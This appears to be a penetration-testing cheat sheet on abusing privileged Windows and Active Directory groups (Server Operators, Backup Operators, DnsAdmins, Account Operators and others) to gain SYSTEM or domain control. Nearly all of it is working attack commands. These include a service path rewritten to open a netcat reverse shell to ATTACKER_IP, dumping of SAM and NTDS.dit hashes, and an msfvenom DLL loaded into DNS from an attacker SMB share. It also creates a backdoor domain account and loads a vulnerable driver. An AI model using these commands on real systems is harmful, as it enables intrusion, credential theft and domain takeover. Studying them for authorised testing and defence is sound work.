Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Check Groups

whoami /groups
net localgroup
net group /domain

Server Operators

Can modify services, load drivers, backup/restore files.

Exploit — Modify Service

sc config VMTools binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc stop VMTools
sc start VMTools
Any service the group can manage works. Common targets: 
sc qc AppReadiness
sc qc VMTools
sc qc browser

Backup Operators

SeBackupPrivilege + SeRestorePrivilege. Read/write any file.

Dump SAM & SYSTEM

reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

Dump NTDS.dit (Domain Controller)

diskshadow.exe

set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:

robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
Extract: 
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Read Any File

robocopy /B C:\Users\Administrator\Desktop C:\Temp confidential.txt
See also Token Abuse for more SeBackupPrivilege techniques.

DnsAdmins

Members can load arbitrary DLL into DNS service (runs as SYSTEM on DC).

Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

Host on SMB

impacket-smbserver share . -smb2support

Load DLL into DNS

dnscmd DC01 /config /serverlevelplugindll \\ATTACKER_IP\share\evil.dll

Restart DNS Service

sc \\DC01 stop dns
sc \\DC01 start dns

Cleanup

dnscmd DC01 /config /serverlevelplugindll ""
Restarting DNS on a domain controller can cause outages. Coordinate with client in real engagements.

Account Operators

Can create/modify users and groups (except Domain Admins, Administrators).

Add User to Domain

net user backdoor P@ssw0rd /add /domain
net group "Remote Desktop Users" backdoor /add /domain

Modify Existing User

net user targetuser NewP@ss123! /domain

Modify Group Membership

net group "Exchange Windows Permissions" backdoor /add /domain
Then abuse Exchange permissions for DCSync.
Can load drivers and manage printers. SeLoadDriverPrivilege.

Load Vulnerable Driver

# Capcom.sys
LoadDriver.exe System\CurrentControlSet\Capcom C:\Temp\Capcom.sys
ExploitCapcom.exe
See Token Abuse — SeLoadDriverPrivilege.

Remote Desktop Users

RDP access to machine. 
xfreerdp3 /v:TARGET /u:user /p:password /cert:ignore
Once in, check local privesc vectors.

Remote Management Users

WinRM access. 
evil-winrm -i TARGET -u user -p password

Hyper-V Administrators

Full control over Hyper-V VMs. Can clone DC virtual disk. 
# Clone VM disk
Copy-Item "C:\VMs\DC01\disk.vhdx" C:\Temp\
# Mount and extract NTDS.dit + SYSTEM

Event Log Readers

Read security event logs. Can find credentials in logs. 
Get-WinEvent -LogName Security | Where-Object { $_.Message -match "password|credential" }

wevtutil qe Security /c:50 /f:text | findstr /i "password"

Quick Reference

GroupImpactTechnique
Server OperatorsSYSTEMModify service binpath
Backup OperatorsSYSTEMDump SAM/NTDS.dit
DnsAdminsSYSTEMLoad DLL in DNS service
Account OperatorsDomainCreate/modify users
Print OperatorsSYSTEMLoad kernel driver
Hyper-V AdministratorsDomainClone DC virtual disk
Event Log ReadersCredsRead security logs